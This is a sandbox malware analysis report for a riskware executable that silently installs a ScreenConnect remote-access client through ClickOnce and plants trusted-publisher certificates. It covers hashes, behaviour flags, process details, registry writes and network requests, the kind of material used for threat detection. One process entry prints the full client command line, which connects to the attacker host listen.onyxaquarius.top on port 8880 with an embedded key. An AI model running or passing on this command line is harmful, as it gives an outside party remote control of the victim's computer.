File name: SecuriteInfo.com.Riskware.00584baa1.19716.27363

Full analysis: https://app.any.run/tasks/6c1a0fbe-0bf6-47f0-bbbd-48b5c0ec40cc
Verdict: Malicious activity
Analysis date: March 14, 2025, 20:01:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: screenconnect, remote
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5: D2DDEB332A340115C17A87FCC4BC7CCE
SHA1: 72711A75FBA028566A0AF785339BBF58050D5FDB
SHA256: 4463AF93D719EAE287FBD89CBBADE6848B7D1B23592436AE55C96BF1F531DAA0
SSDEEP: 1536:cflrL5PZVm5c7cwFgnPfdwngb7XCdqQsWQcdnSfqlNKk:crL5RVm5c7cegn3dwgbD+lnSfqv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SCREENCONNECT has been detected (SURICATA)

      • ScreenConnect.WindowsClient.exe (PID: 7564)
  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 5176)
    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 5176)
    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
      • ScreenConnect.ClientService.exe (PID: 7660)
    • Reads the date of Windows installation

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
    • Executes application which crashes

      • ScreenConnect.ClientService.exe (PID: 7660)
      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
    • Potential Corporate Privacy Violation

      • ScreenConnect.WindowsClient.exe (PID: 7564)
    • Connects to unusual port

      • ScreenConnect.WindowsClient.exe (PID: 7564)
  • INFO

    • Checks supported languages

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
      • ScreenConnect.ClientService.exe (PID: 7660)
    • Reads the machine GUID from the registry

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
      • ScreenConnect.ClientService.exe (PID: 7660)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
    • Reads the computer name

      • SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe (PID: 5256)
      • dfsvc.exe (PID: 5176)
      • ScreenConnect.ClientService.exe (PID: 7660)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
    • Reads Environment values

      • dfsvc.exe (PID: 5176)
    • Disables trace logs

      • dfsvc.exe (PID: 5176)
    • Checks proxy server information

      • dfsvc.exe (PID: 5176)
    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 5176)
    • Reads the software policy settings

      • dfsvc.exe (PID: 5176)
      • slui.exe (PID: 5332)
    • Create files in a temporary directory

      • dfsvc.exe (PID: 5176)
    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
      • WerFault.exe (PID: 7884)
      • WerFault.exe (PID: 8140)
    • Process checks computer location settings

      • dfsvc.exe (PID: 5176)
      • ScreenConnect.WindowsClient.exe (PID: 7564)
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:12:18 21:38:20+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.4
CodeSize: 40960
InitializedDataSize: 33280
UninitializedDataSize: -
EntryPoint: 0x1489
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
Total processes: 149
Monitored processes: 10
Malicious processes: 2
Suspicious processes: 1

Behavior graph

Process nodes, in graph order from start: securiteinfo.com.riskware.00584baa1.19716.27363.exe, dfsvc.exe, sppextcomobj.exe (no specs), slui.exe, screenconnect.windowsclient.exe (#SCREENCONNECT), screenconnect.clientservice.exe, werfault.exe (no specs), svchost.exe, werfault.exe (no specs), slui.exe (no specs)

Process information

Each entry lists PID, command line (CMD), image path, parent process, then process details and loaded modules.
PID: 1628
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\sppextcomobj.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\bcrypt.dll
  • c:\windows\system32\oleaut32.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\svchost.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\bcrypt.dll
  • c:\windows\system32\ucrtbase.dll
  • c:\windows\system32\combase.dll
  • c:\windows\system32\kernel.appcore.dll
PID: 5176
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Parent process: SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: ClickOnce
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
  • c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\mscoree.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\apphelp.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
PID: 5256
CMD: "C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe"
Path: C:\Users\admin\AppData\Local\Temp\SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221225477
Modules (images):
  • c:\users\admin\appdata\local\temp\securiteinfo.com.riskware.00584baa1.19716.27363.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\apphelp.dll
  • c:\windows\syswow64\crypt32.dll
PID: 5332
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\slui.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\bcrypt.dll
  • c:\windows\system32\user32.dll
PID: 7252
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\system32\slui.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
  • c:\windows\system32\bcrypt.dll
  • c:\windows\system32\user32.dll
PID: 7564
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.WindowsClient.exe"
Path: C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.WindowsClient.exe
Parent process: dfsvc.exe
User: admin
Company: ScreenConnect Software
Integrity Level: MEDIUM
Description: ScreenConnect Client
Exit code: 0
Version: 24.4.4.9118
Modules (images):
  • c:\users\admin\appdata\local\apps\2.0\8bejbam1.h5k\b218zt8b.8xl\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\screenconnect.windowsclient.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\system32\mscoree.dll
  • c:\windows\system32\kernel32.dll
  • c:\windows\system32\kernelbase.dll
  • c:\windows\system32\apphelp.dll
  • c:\windows\system32\advapi32.dll
  • c:\windows\system32\msvcrt.dll
  • c:\windows\system32\sechost.dll
  • c:\windows\system32\rpcrt4.dll
PID: 7660
CMD: "C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=listen.onyxaquarius.top&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQB9eol0tmtminnJycWn2qSYOieHyBTVp1d1y1QrZEoI3RWvKJ6BPv8fUNBcM0a2e75xdgPr1lWax4h3%2fFK6Nn8Z%2bB4hbbLxc%2fWmM2jKz9UwR6MlJvynQqQvv5AmQKnNe0KTj9q7fxjc5x4mqY%2bNaT8lz6G%2fAZdcTf8e2UWl%2bz9sxdsSEsX3EYU%2bWT35vvcNr8Y%2f6SvrWj5pUycpP%2bzkIsIHr1HUCDl48PhKHW4jx%2fxGOfQ%2b0F1TwZWvL2QOW011yid3z7ERs3ozSZ94yl2%2bVllVhsjUF2P9KBQdZut7%2bfkldr328RsrKu5yrCEXW6hgNO63z7GLnfBKvGya4xFkVHrC&r=&i=" "5"
Path: C:\Users\admin\AppData\Local\Apps\2.0\8BEJBAM1.H5K\B218ZT8B.8XL\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\ScreenConnect.ClientService.exe
Parent process: ScreenConnect.WindowsClient.exe
User: admin
Integrity Level: HIGH
Exit code: 3762504530
Version: 24.4.4.9118
Modules (images):
  • c:\users\admin\appdata\local\apps\2.0\8bejbam1.h5k\b218zt8b.8xl\scre..tion_25b0fbb6ef7eb094_0018.0004_8e1e23156f442b5d\screenconnect.clientservice.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\apphelp.dll
  • c:\windows\syswow64\shlwapi.dll
PID: 7884
CMD: C:\WINDOWS\SysWOW64\WerFault.exe -u -p 7660 -s 1252
Path: C:\Windows\SysWOW64\WerFault.exe
Parent process: ScreenConnect.ClientService.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Problem Reporting
Exit code: 0
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\syswow64\werfault.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\msvcrt.dll
  • c:\windows\syswow64\combase.dll
PID: 8140
CMD: C:\WINDOWS\SysWOW64\WerFault.exe -u -p 5256 -s 232
Path: C:\Windows\SysWOW64\WerFault.exe
Parent process: SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Problem Reporting
Exit code: 0
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images):
  • c:\windows\syswow64\werfault.exe
  • c:\windows\system32\ntdll.dll
  • c:\windows\syswow64\ntdll.dll
  • c:\windows\system32\wow64.dll
  • c:\windows\system32\wow64win.dll
  • c:\windows\system32\wow64cpu.dll
  • c:\windows\syswow64\kernel32.dll
  • c:\windows\syswow64\kernelbase.dll
  • c:\windows\syswow64\msvcrt.dll
  • c:\windows\syswow64\combase.dll
Total events: 12 096
Read events: 11 892
Write events: 171
Delete events: 33

Modification events

(PID) Process: (5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process: (5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation: write
Name: Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A0608
2B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process: (5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation: delete value
Name: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process: (5256) SecuriteInfo.com.Riskware.00584baa1.19716.27363.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation: write
Name: Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F04
81AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process: (5176) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: 4ODZWAGYH6DV9WA8539AJOYC

(PID) Process: (5176) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete value
Name: ComponentStore_RandomString
Value: 4ODZWAGYH6DV9WA8539AJOYC

(PID) Process: (5176) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: delete key
Name: (default)
Value:

(PID) Process: (5176) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation: write
Name: ComponentStore_RandomString
Value: 8BEJBAM1H5KB218ZT8B8XL0N

(PID) Process: (5176) dfsvc.exe
Key: HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation: write
Name: StateStore_RandomString
Value: 1A20RMZRWVLT6X2NOMH32MAL

(PID) Process: (5176) dfsvc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0
Executable files: 16
Suspicious files: 25
Text files: 28
Unknown types: 0

Dropped files

PID | Process | Filename | Type

5176 | dfsvc.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792 | binary
  MD5: D2DED43CE07BFCE4D1C101DFCAA178C8
  SHA256: 8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
5176 | dfsvc.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 | binary
  MD5: 9D1B26309C532142302B58D732CA0566
  SHA256: 5E5E4E444E9C97CD426E38F12C058C1F597D2E2F6035539BDDEC248527FB3B33
5176 | dfsvc.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B | binary
  MD5: E9B50C2AAD344FE31F3357D33C806DB1
  SHA256: DCD524D720B801877BF6F1A2F2D1AA885D6E6F0263DB23EBD2722152C4B19DE6
5176 | dfsvc.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 | binary
  MD5: 31E19F1B6532E52BE11C982ECAD4AFC7
  SHA256: 3A780D4D76E0C453B9F9F698A8B0033A9FDB6369E743AA174BE190C380AF2EC8
5176 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.WindowsClient.exe:Zone.Identifier | text
  MD5: FBCCF14D504B7B2DBCB5A5BDA75BD93B
  SHA256: EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
5176 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.WindowsFileManager.exe | executable
  MD5: 8531526B6F151A08AD8A551611F686D3
  SHA256: A5ECC6FFDA3D32803775EBA060D42212C78BD3E7964BF44408750386B7CFB8F7
5176 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.WindowsClient.exe.config | xml
  MD5: 728175E20FFBCEB46760BB5E1112F38B
  SHA256: 87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
5176 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.ClientService.exe | executable
  MD5: D3E628C507DC331BAB3DE1178088C978
  SHA256: D7D98508730B4384D7E3DCA63A2756D81AF3C54156EFB7B7299004CC2A9B6AB3
5176 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.Windows.dll | executable
  MD5: 7099C67FE850D902106C03D07BFB773B
  SHA256: 2659F660691D65628D2FCC3BFC334686CD053F162CDB73BF7A0DA0AC6449DB92
5176 | dfsvc.exe | C:\Users\admin\AppData\Local\Temp\Deployment\RO0Q425K.YQB\EP2HL0ZW.DR9\ScreenConnect.Core.dll | executable
  MD5: 665A8C1E8BA78F0953BC87F0521905CC
  SHA256: 3D016BEF20B3D2425939BFE32BEA6F8C08649399D8BE5A83EB461BC0E0C914EB
HTTP(S) requests: 8
TCP/UDP connections: 27
DNS requests: 17
Threats: 3

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation

- | - | GET | 200 | 23.48.23.188:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5176 | dfsvc.exe | GET | 200 | 23.40.158.218:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D | unknown | whitelisted
5176 | dfsvc.exe | GET | 200 | 23.40.158.218:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D | unknown | whitelisted
896 | backgroundTaskHost.exe | GET | 200 | 23.40.158.218:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
